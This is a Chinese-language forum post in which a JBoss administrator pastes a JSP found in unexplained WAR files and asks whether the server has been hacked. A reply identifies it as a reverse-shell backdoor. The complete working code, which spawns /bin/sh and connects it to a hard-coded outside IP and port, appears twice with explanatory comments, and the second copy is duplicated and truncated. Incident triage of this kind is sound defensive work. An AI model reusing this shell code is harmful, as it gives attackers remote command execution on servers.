我有一台 JBoss 服务器,放在公网上,整个机房有防火墙等防护。近期突然发现 JBoss 的 deploy 目录下不定时出现不明 war 包,名称都类似于 eAjFvtqD.war、gnJzyXUp.war、OinXcQQS.war,里面只有一个 jsp 文件,内容如下:
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
%>
<%!
/**
 * Thread that copies characters from one stream to another until the source
 * stops returning data.
 *
 * This is part of a sample recovered from an unexpected WAR file. The scriptlet
 * later in the page creates two instances, one per direction, to bridge a local
 * process and a network socket.
 */
static class StreamConnector extends Thread
{
// Source (is) and destination (os) of the copy; both are assigned once by the
// constructor declared on the next lines.
InputStream is;
OutputStream os; StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
} public void run()
{
// Declared outside the try so the cleanup section below can still see them.
BufferedReader in = null;
BufferedWriter out = null;
try
{
// No charset is given, so bytes are decoded/encoded with the platform default.
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
// Relay loop: forward each chunk as soon as it is read. The loop ends when
// read() returns 0 or -1 (end of stream).
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
// Flush per chunk so data is not held back in the BufferedWriter.
out.flush();
}
// Empty catch: any I/O error silently ends the relay. Nothing is logged, so this
// code leaves no exception trace in the application logs.
} catch( Exception e ){}
// Cleanup: closing the wrappers also closes the underlying streams. Errors are
// again discarded.
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
<%
// Scriptlet body: it executes each time this JSP is requested.
// Net effect of the statements below: a shell process on the server is bridged
// in both directions to a remote host, so the remote end gets an interactive shell.
// Triage indicators visible in this code: an outbound TCP connection from the
// application-server JVM to the hard-coded address and port, and a /bin/sh child
// process of that JVM.
try
{
// Outbound connection initiated by the server, not an inbound listener.
Socket socket = new Socket( "46.38.56.241", 82 );
// The shell is a child of the application-server process and runs with that
// process's OS account.
Process process = Runtime.getRuntime().exec( "/bin/sh" );
// Shell stdout -> socket. The shell's stderr (getErrorStream) is not forwarded.
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
// Socket -> shell stdin: whatever the remote end sends is fed to the shell.
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
// Neither the socket nor the process is closed here. The two relay threads keep
// running after the request has returned.
// Empty catch: failures such as a refused connection are discarded, so this code
// reports no error.
} catch( Exception e ) {}
%>
请大牛帮我看看,这是中了病毒,还是被人黑了?JBoss 的控制台密码我都已经设置了啊。
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
%>
<%!
/**
 * Thread that copies characters from its input stream to its output stream
 * until the input stops returning data.
 *
 * The scriptlet that follows this declaration starts two instances to relay
 * data between a local process and a network socket, one per direction.
 */
static class StreamConnector extends Thread
{
// Copy source (is) and copy destination (os), set by the constructor below.
InputStream is;
OutputStream os; StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
} public void run()
{
// Kept outside the try block so the close section can reach them.
BufferedReader in = null;
BufferedWriter out = null;
try
{
// Platform-default charset is used in both directions (none is specified).
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
// Forward data chunk by chunk. The loop stops once read() returns 0 or -1.
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
// Immediate flush so each chunk is delivered without waiting for more data.
out.flush();
}
// Exceptions are swallowed: the relay stops quietly and nothing is logged.
} catch( Exception e ){}
// Close both wrappers (and with them the underlying streams), ignoring errors.
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
<%
// Runs on each request for this JSP. It connects out to a hard-coded host, starts
// a shell, and relays data between the two in both directions. The result is a
// remote interactive shell on the server.
// Defender-relevant indicators in this code: the outbound connection from the
// application-server JVM to the address/port below, and /bin/sh running as a
// child of that JVM.
try
{
// Connection is made from the server outwards to the remote host.
Socket socket = new Socket( "46.38.56.241", 82 );
// Shell inherits the OS account of the application-server process.
Process process = Runtime.getRuntime().exec( "/bin/sh" );
// Shell output is sent to the remote end. stderr is not relayed.
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
// Data received from the remote end becomes the shell's input.
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
// Socket and process are left open. The relay threads outlive the request.
// All failures are silently ignored, so no error is reported by this code.
} catch( Exception e ) {}
%>
请大牛帮我看看,这是中了病毒,还是被人黑了?JBoss 的控制台密码我都已经设置了啊。
看这段程序,就是在你的服务器上启动 /bin/sh,并把它和到 46.38.56.241 的 82 端口的连接双向对接:shell 的输出发送给对方,对方发来的内容则作为输入交给 shell 执行。也就是说,这是一个反弹 shell 后门,对方可以借此在你的服务器上执行命令。
执行下看看啥效果(只应在隔离的测试环境里做;在这台服务器上执行等于把 shell 交给对方)。